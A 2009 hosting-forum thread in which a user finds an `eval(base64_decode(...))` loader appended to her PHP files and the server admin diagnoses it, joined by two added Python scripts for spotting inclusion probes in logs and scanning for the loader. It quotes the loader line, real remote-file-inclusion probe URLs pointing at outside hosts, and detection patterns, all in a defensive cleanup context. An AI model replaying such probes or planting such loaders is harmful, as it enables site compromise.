HACK'D!

Started by Miluette, June 20, 2009, 05:10:07 AM


Miluette

HEY, so suddenly I found out that every PHP file I have uploaded throughout all my sites has had something like this appended to the top of the file:


<? /**/eval(base64_decode('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')); ?>


I reinstalled my Wordpress installs and am reuploading everything else. I found this out when suddenly files I was uploading were smaller than live files, and when someone pointed out that all the text on my sites looked like spam text on his phone browser. :[

How do you think this happened? I still gotta fix my oekaki and news files too, gah.
Arggh, and my forum too. Can you have SMF forums auto-reinstall like Wordpress? (Well, I just updated it to 1.1.9, but there're still some old hacked files.)

Gah, even my plugins are haxed. D:

EDIT: Okay, I reuploaded everything but my plugins and forum themes. Guh.

Someone's explaining how this could have happened: "shared server php upload and/or append hack". Just when I thought I never had to worry about permissions!
He says the hack may be this: http://www.lonelyfetus.com/hack.txt
And looks like this decoded: http://www.lonelyfetus.com/decodedhack.txt or something
If that helps.

Actually, looking more closely at that, it mentions the directory of a forum theme I wasn't even using and thought I had deleted. I bet one of the forum accounts that signed up but never posted did this. e__e

Note that I think this happened on the 15th and again on the 17th, since that's when all my files were modified on the server despite my having not touched them in ages.
And wasn't it you who told me,
"The sun would always chase the day"?

Xepher

Well, due to the way the server is set up, and provided you hadn't changed the permissions on any files to be world writable (chmod 777, which you should NEVER need to do here) the hack had to have come from an exploit on your own site. Most likely wordpress or another similar PHP package. This sort of thing is VERY common. I see it all the time at work, and it's the reason I've designed the server's systems in the way I have, so that if one account gets exploited, the exploit shouldn't be able to affect anyone else.

Now, as to fixing it... I do make nightly backups of everything in all accounts, so I can revert your files to the day before the hack if you want. At that point you can proceed to upgrade everything and try to secure it. I don't know if it will break stuff in wordpress since you've already upgraded the database possibly.

I see dozens of exploit attempts in the logs (which isn't surprising), and specifically these from the 15th:


76.8.190.193 - - [15/Jun/2009:03:39:03 +0000] "GET /index.php?action=http://217.218.225.2:2082/index.html? HTTP/1.1" 200 29380 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

70.84.173.226 - - [15/Jun/2009:12:54:14 +0000] "GET /index2.php?page=http://www.walkinroll.org/site/components/com_ignteam/Response.txt???? HTTP/1.1" 200 20875 "-" "libwww-perl/5.76"

64.127.40.199 - - [15/Jun/2009:18:48:33 +0000] "GET /index.php?board=http://217.218.225.2:2082/index.html? HTTP/1.1" 200 29379 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

Now, because of the way you have rewrites set up, that could've been the root of any one of your sites. Basically, they're trying to trick the code into loading the remote code in the URL they give.

Anyway, let me know if you want me to restore backups of anything. I can put it in a separate folder to let you pick through things if you want. Also, you'll want to make sure to login to https://xepher.net/user-services/ and change your password, as any hack that can change your PHP files could possibly have read your database password from the configuration for a forum or wordpress, etc.
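
The log lines Xepher quotes are remote-file-inclusion probes: a query parameter that should hold an action or board id carries a full URL instead, hoping the script will include() it. The script below is an added example (not Xepher's code or anything running on the server) showing how a defender can pull such probes out of an Apache combined-format access log. The sample log lines are constructed, using RFC 5737 addresses and .example hostnames rather than the real entries from the thread; the parser and the "parameter value is a URL" rule are the point.

```python
"""Flag remote-file-inclusion probes in an Apache combined-format access log.

Added example, not code from the thread. SAMPLE_LOG is constructed (RFC 5737
addresses, .example hosts), not the thread's real log entries.
"""
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample: two probes like those in the thread, two normal SMF
# requests, and one probe with a percent-encoded URL.
SAMPLE_LOG = """\
192.0.2.10 - - [15/Jun/2009:03:39:03 +0000] "GET /index.php?action=http://203.0.113.5:2082/index.html? HTTP/1.1" 200 29380 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
192.0.2.11 - - [15/Jun/2009:12:54:14 +0000] "GET /index2.php?page=http://files.example/Response.txt???? HTTP/1.1" 200 20875 "-" "libwww-perl/5.76"
198.51.100.7 - - [15/Jun/2009:13:01:00 +0000] "GET /index.php?board=3.0 HTTP/1.1" 200 18000 "-" "Mozilla/5.0"
198.51.100.8 - - [15/Jun/2009:13:02:00 +0000] "GET /index.php?action=profile;u=42 HTTP/1.1" 200 15000 "-" "Mozilla/5.0"
198.51.100.9 - - [15/Jun/2009:13:03:00 +0000] "GET /index.php?page=http%3A%2F%2Ffiles.example%2Fx.txt HTTP/1.1" 404 512 "-" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [time] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A parameter value that is itself an absolute URL (any scheme) is the tell:
# legitimate SMF/WordPress parameters are actions, board ids or page slugs,
# never full URLs.
URL_VALUE_RE = re.compile(r'^\s*[a-z][a-z0-9+.-]*://', re.I)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def find_inclusion_probes(log_text):
    """Return one finding per query parameter whose (decoded) value is a URL."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        parts = urlsplit(rec["target"])
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if URL_VALUE_RE.match(value):
                findings.append({
                    "ip": rec["ip"],
                    "script": parts.path,
                    "param": name,
                    "value": value,
                    "status": int(rec["status"]),
                    "ua": rec["ua"],
                })
    return findings


def probes_by_source(findings):
    """Count probes per client address, for a quick view of who is hammering the site."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in find_inclusion_probes(SAMPLE_LOG):
        print(f"{f['ip']} -> {f['script']} ?{f['param']}= {f['value']!r} (HTTP {f['status']})")
```

Point it at a real access log with `find_inclusion_probes(open(path).read())`. A 200 on a probe, as in Xepher's lines, proves little on its own: the application may simply have ignored the parameter and served its normal page, so the follow-up is to check whether the named script actually passes that parameter to include/require or fopen, and to cross-check file modification times against the probe timestamps, as Miluette did with the 15th and 17th.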

Xepher

Okay, I just checked. It looks like huge amounts of your files are world and group writable. So the exploit could theoretically be on someone else's site, but only infected yours because that's all it could write to. It's very important NOT to chmod 777 anything. In fact, files should always be 600, and directories 700. I've reset all the files in your public_html folder for you.

Xepher

Here's a list of files that are still infected...


./public_html/forums/Sources/CustomProfile.php
./public_html/forums/Sources/ProfileComments.php
./public_html/forums/index.php
./public_html/forums/Themes/DefGray/index.template.php
./public_html/forums/Themes/DefGray/index.php
./public_html/forums/Themes/default/ProfileComments.template.php
./public_html/forums/Themes/default/languages/ProfileComments.english-utf8.php
./public_html/forums/Themes/default/languages/CustomProfile.english.php
./public_html/forums/Themes/default/languages/ProfileComments.english.php
./public_html/forums/Packages/backups/index.php
./public_html/forums/Smileys/default/index.php
./public_html/forums/Smileys/classic/index.php
./public_html/lf/images/skin/yu/rotate.php
./public_html/lf/pages/bottom.php
./public_html/lf/pages/404.php
./public_html/lf/pages/top.php
./public_html/lf/pages/wp-content/plugins/ozh-admin-drop-down-menu/uninstall.php
./public_html/lf/pages/wp-content/plugins/ozh-admin-drop-down-menu/inc/icons.php
./public_html/lf/pages/wp-content/plugins/ozh-admin-drop-down-menu/inc/core.php
./public_html/lf/pages/wp-content/plugins/ozh-admin-drop-down-menu/inc/adminmenu.css.php
./public_html/lf/pages/wp-content/plugins/ozh-admin-drop-down-menu/inc/mu.php
./public_html/lf/pages/wp-content/plugins/ozh-admin-drop-down-menu/inc/options.php
./public_html/lf/pages/wp-content/plugins/db-cache/db-options.php
./public_html/lf/pages/wp-content/plugins/db-cache/db-functions.php
./public_html/lf/pages/wp-content/plugins/db-cache/db-module.php
./public_html/oekaki/advanced/config.php
./public_html/oekaki/advanced/dbconn.php
./public_html/oekaki/advanced/banner.php
./public_html/oekaki/advanced/notice.php
./public_html/oekaki/advanced/announce.php
./public_html/oekaki/sketchyfun/config.php
./public_html/oekaki/sketchyfun/dbconn.php
./public_html/oekaki/sketchyfun/banner.php
./public_html/oekaki/sketchyfun/notice.php
./public_html/oekaki/sketchyfun/announce.php
./public_html/mil/lp_admin.php
./public_html/mil/lp_recookie.php
./public_html/mil/comic.php
./public_html/mil/kiriban.php
./public_html/mil/pages/wp-content/plugins/ozh-admin-drop-down-menu/uninstall.php
./public_html/mil/pages/wp-content/plugins/db-cache/languages/ru_RU.php
./public_html/mil/pages/wp-content/plugins/db-cache/languages/en_US.php
./public_html/mil/pages/wp-content/plugins/db-cache/languages/it_IT.php
./public_html/mil/pages/wp-content/plugins/db-cache/languages/nl_NL.php
./public_html/mil/pages/wp-content/plugins/db-cache/languages/uk_UA.php
./public_html/mil/pages/wp-content/plugins/db-cache/languages/tr_TR.php
./public_html/mil/pages/wp-content/plugins/db-cache/db-options.php
./public_html/mil/pages/wp-content/plugins/db-cache/db-functions.php
./public_html/mil/pages/wp-content/plugins/db-cache/db-module.php
./public_html/mil/pages/wp-content/backup-6cb44/index.php
./public_html/mil/online.php
./public_html/mil/updates.php
./public_html/mil/gallery/index.php
./public_html/ai/huh.php


All found with

find -iname "*.php" -exec fgrep 'eval(base64' -l \{\} \;
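
Xepher's `find` one-liner and his permission reset (files 600, directories 700) are two halves of one cleanup: locate the injected loader, and remove the group/world-writable bits that let it spread. The script below is an added example, not Xepher's tooling, that does both over a directory tree and reports what it changed. It extends the grep pattern to whitespace-tolerant and wrapped variants such as `eval(gzinflate(base64_decode(`, since Miluette mentions seeing variations of this attack. The demo tree it builds is constructed sample data, not files from the thread; it assumes a POSIX filesystem where chmod is honoured.

```python
"""Find eval(base64_decode(...)) loaders in PHP files and tighten loose permissions.

Added example, not the server's own tooling. build_demo_tree() writes constructed
sample files to a temp directory; nothing here touches real sites.
"""
import os
import re
import stat
import tempfile
from pathlib import Path

# Matches the loader appended in this thread (`/**/eval(base64_decode('...'))`)
# and wrapped variants like eval(gzinflate(base64_decode(...))).
MALWARE_RE = re.compile(rb'eval\s*\(\s*(?:\w+\s*\(\s*)*base64_decode\s*\(', re.I)

# Xepher's recommendation for this shared host: files 600, directories 700.
FILE_MODE, DIR_MODE = 0o600, 0o700
LOOSE_BITS = stat.S_IWGRP | stat.S_IWOTH  # group- or world-writable


def scan_tree(root):
    """Return infected .php files and any group/world-writable paths under root."""
    root = Path(root)
    infected, loose_perms = [], []
    for path in sorted(root.rglob("*")):
        if path.is_symlink():
            continue
        perm = stat.S_IMODE(path.stat().st_mode)
        if perm & LOOSE_BITS:
            loose_perms.append((str(path.relative_to(root)), oct(perm)))
        # Same scope as the thread's `find -iname "*.php"`: only PHP sources.
        if path.is_file() and path.suffix.lower() == ".php":
            if MALWARE_RE.search(path.read_bytes()):
                infected.append(str(path.relative_to(root)))
    return {"infected": infected, "loose_perms": loose_perms}


def fix_permissions(root):
    """Set files to 600 and directories to 700; return how many paths changed."""
    changed = 0
    for path in Path(root).rglob("*"):
        if path.is_symlink():
            continue
        want = DIR_MODE if path.is_dir() else FILE_MODE
        if stat.S_IMODE(path.stat().st_mode) != want:
            os.chmod(path, want)
            changed += 1
    return changed


def build_demo_tree():
    """Constructed sample tree: one clean file, two infected, one 777 upload dir."""
    root = Path(tempfile.mkdtemp(prefix="phpscan_"))
    (root / "clean.php").write_bytes(b"<?php echo 'hello'; ?>\n")
    (root / "infected.php").write_bytes(
        b"<? /**/eval(base64_decode('QUJD')); ?>\n<?php echo 'page'; ?>\n")
    (root / "variant.php").write_bytes(
        b"<?php eval(gzinflate(base64_decode('QUJD'))); ?>\n")
    (root / "uploads").mkdir()
    (root / "uploads" / "thumb.txt").write_bytes(b"thumbnail placeholder\n")
    os.chmod(root / "clean.php", 0o664)       # group-writable: flagged
    os.chmod(root / "infected.php", 0o600)
    os.chmod(root / "variant.php", 0o600)
    os.chmod(root / "uploads", 0o777)         # the classic "chmod 777 this folder"
    os.chmod(root / "uploads" / "thumb.txt", 0o600)
    return root


def demo():
    """Scan, tighten, rescan. Tightening fixes permissions but not infections."""
    root = build_demo_tree()
    before = scan_tree(root)
    changed = fix_permissions(root)
    after = scan_tree(root)
    return before, changed, after


if __name__ == "__main__":
    before, changed, after = demo()
    print("infected:", before["infected"])
    print("loose permissions:", before["loose_perms"])
    print(f"chmod applied to {changed} path(s); remaining loose: {after['loose_perms']}")
```

The second scan in `demo()` still lists both infected files: resetting modes stops the next write, it does not undo the one that already happened, which is why Xepher's reset and his file list are separate steps. Run `scan_tree("public_html")` before trusting a reupload, since a clean copy dropped over an infected tree leaves any file the reupload did not include untouched.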

Miluette

Thank you! I never manually change any of my files' permissions - except a few days ago I DID chmod a folder to 777, which only had some thumbnail files in it, and probably forgot to change it back to 700. 'Zat bad? D:

It's possible that some of my files were still world and group writable from waaay before the server upgrade, back when I had to fix permissions for my PHP files after uploading them, or something. (Actually, maybe not. I've changed pretty much everything since then.) But I know most of them were 700, and all of them were affected, lol. So you reset aaaall the sites' permissions? Yay! All should be well if I just upload things and leave them alone, then?

And yeah, don't revert anything. I did a good bit of unrelated modding after trying to undo this hack last night (and since the 15th, even), and I can't specifically remember what I'd need to redo, lol...

When I change my password, will all my database-based things break until I edit their config files?

Databits

Xepher, can't you just change the permissions for the user home directories to help prevent this from other infected sites in the future?
(\_/)    ~Relakuyae D'Selemae
(o.O)    
(")_(")  [Libre Office] [Chrome]

Xepher

I have changed them so that everything is 700, and the default is 700. However, a lot of CMS install instructions say "chmod 777 this file..." or some such. Nothing should EVER make stuff world writable, yet I always find files set that way.

This particular hack does look to have come from her own site though. I searched and no other php files on the system (despite many being world writable again) were infected with the same code.

Still though, if you have a suggestion for how to make things more secure, let me know.

Miluette

Yeah, some things instruct you to chmod files to 775 or 777 or something and I never do that 'cause there's no reason to. Everything still works even if you don't. \o/ (I hope. Don't wanna mess with my oekaki or anything anymore, not like that.)

Hey, hey, "When I change my password, will all my database-based things break until I edit their config files?" I need to know how quickly I'll need to edit everything else so that they work.

Xepher

Oh, sorry, forgot to answer that. FYI, always feel free to hit me up on AIM/YahooIM/Gtalk... my screen name is "Xepher42".

To answer you though, yes, changing your password means you need to change it in the configs for all applications that access your database.

Miluette

It always looks like you have your away message on, lol. Unless you're actually not away all that time... :O

Databits

He does almost always have his away message up, but hit him up anyhow. Even if he doesn't respond right away he tends to "get back to you". ;)

Xepher

Yeah, I work nights, so I'm only on at like 9am for an hour or two until my weekends (Sun-Tue). Like Data said, leave a message, and I'll see it next time I'm on.

Miluette

I've been meaning to ask if you can check if there're any infected files left. I think I already took care of all of 'em, but I may have missed one.

In recent times I've found out that people in general, and some webcomics, have been hacked with a bunch of variations of this kind of attack...a lot. And the hacks I've heard of were a lot worse than replacing all the text with spammy gibberish, too. *shudder*

Xepher

Nothing left with that same hack in it.
